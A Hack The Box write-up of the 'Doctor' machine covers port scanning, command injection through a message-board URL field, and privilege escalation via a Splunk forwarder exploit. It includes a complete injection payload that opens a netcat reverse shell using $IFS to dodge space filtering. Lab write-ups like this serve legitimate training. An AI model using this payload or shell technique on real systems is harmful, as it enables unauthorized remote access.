Doctor HTB
Doctor Box walkthrough by fuxsocy


As always we start by scanning for open ports using nmap. nmap 3 ports are available 22(ssh), 80(http), 8089(ssl/https).

80 http

Once I visit the ip on my browser I get a webpage.


The only information I get from this is a hostname doctors.htb from the send us a message section. I enter this on my hosts file.


I have a login page, but also I have the functionality to register. After registering:


My app does log me in automatically. Also there is a message which let’s me know that a time limit of twenty minutes for my account is in place. Using the New Message button we can send a message to something which looks like a board.


After providing a url as the Content to an url which is mine.



And I got a request back, which means we have something like a command injection. Let’s try to execute a wget command by using $(wget But I get link posted is not valid. link_not_valid Let’s try to execute a command using http://IP/$(id) so we get back the result of id as the requested file.


Now I can execute commands inside $(). Let’s execute a reverse shell.


Nothing happend. I will try to add $IFS instead of spaces, but again it didn’t work, I had to find the nc binary inside the machine and then use single quote to get it work. This is the complete command:$(/usr/bin/nc.traditional$IFS-e$IFS/bin/sh$IFS''$IFS'7979')



After the shell I try to look for passwords to escalate to another user, but after a little bit I found inside /var/log/apache2/ there is a backup file. I find a password inside of it.


I use it with shaun which gives me user.txt.


Inside /opt/ folder I find splunkforwarder. Searching for this I find that this forwarder is used to collect data and then forward it to the splunk software, which seems to be something like a visualization software. Reading README-splunk.txt I get the version but didn’t manage to find an exploit for the exact version.I also find github repo which has a script to exploit this. I get the local exploit and upload it to the target machine. I get an error about not found modules, and I can’t installed them using pip. I try the remote exploit on my local machine. I create a file inside /tmp/ which includes a reverse shell and then execute the script. Also I listen on the specified port.


And I get root access.


The quieter you become, the more you are able to hear.